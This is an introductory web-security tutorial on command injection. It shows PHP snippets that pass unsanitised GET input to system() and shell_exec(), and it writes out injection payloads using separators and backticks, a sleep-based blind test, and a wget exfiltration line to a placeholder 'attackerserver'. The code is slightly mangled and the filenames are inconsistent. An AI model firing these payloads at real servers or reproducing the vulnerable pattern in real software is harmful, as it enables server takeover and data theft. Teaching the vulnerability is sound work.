Command Injection vulnerability in Web Applications : Part 1 | Introduction

The Command Injection Vulnerability allows an attacker to execute system level command on the vulnerable web server. This vulnerability occurs when an application passes unsafe user-supplied data (for example from get-post parameters, cookies, HTTP-headers etc ) without any sanitization or proper security checks to shell command execution functions like system(), shell_exec() etc. And these function will execute user/Attacker supplied data/command.

This vulnerability could lead to various consequences, for example complete takeover of server, stealing sensitive data, launching Denial of service attacks etc. Now lets see an example of command injection vulnerability.

Filename : test.php
  if(empty($_GET['file'])) {
    echo "Please give the file name !!"; 
  $file = $_GET['file'];
  system("wc -c $file");
  echo " Bytes";
The above php code will prints the size in bytes of given file name, Note that there are system() function is used to execute system command, and there are a file named data.txt on the web server.

Output :

It prints the file size as expected. But at here an attacker could also gives other shell command with the parameter 'file', and due to absence of any kind of security checks on user supplied data, the system() function will execute it. For example :

At above, the data supplied with 'file' parameter are : "data.txt;ls", where ls is list command and ';' (semicolon) is used to indicate end of line, which indicates that there's another separate command after this. Another example :
 /test.php?file=data.txt;uname -a

We can also use some other methods like :

'&&' sign :  If first command will succeeds then second command run. Example
 /test.php?file=data.txt && uname
'|' sign :   Redirects the output of first command to second one. Example
 /test.php?file=data.txt | uname
'||' sign : Only if first command will fail then second command will run. Example :
 /test.php?file=filenotexists || uname
using of '`' (backtic) sign : The backtic sign can be used to execute command. Example :
 /test.php?file=data.txt `uname`

Types of Command Injection :

1. Generic Command injection : The output of executed command will return as response. The example above we have seen is generic command injection type.

2. Blind Command Injection : The output of executed command does not returns in response. Now lets see another example to understand Blind Command injection.

Filename : bci.php
  if(empty($_GET['file'])) {
    echo "Please give the file name !!"; 
  $file = $_GET['file'];
  shell_exec("rm $file");
  echo "$file is removed.";
The above php code will delete the user supplied file name from the web directory. Also note that, shell_exec() function is used instead of system(), and shell_exec() does not return any output to the response page. Now lets run the above example :

and when we put shell command on the parameter, then it does not show anything related to 'ls' command.

This type of command injection is known as blind command injection, because we did not see the output of executed command on response. In this situation we can use some other commands like 'sleep', which pauses the execution for some second. Example :
 /pci.php?file=data.txt;sleep 10

and as we can see that webapp is waiting for the server response, means it is vulnerable to command injection attack. In this situation, to exfiltrate data from the sever we can make request from the vulnerable server to our server with the data as parameter. Example :
 /pci.php?file=data.txt;wget http://attackerserver/$(command_to_be_executed)

Note that at above a wrapper "$(command)" is used to execute command on the server.

Conclusion :

This is a very basic introduction to Command Injection Vulnerability. In next post we are going to see some methods and techniques to bypass security checks and sanitization bypass.

Link : Command Injection Part 2 | Bypass Security checks

Visit the link for more tutorials about Web Security :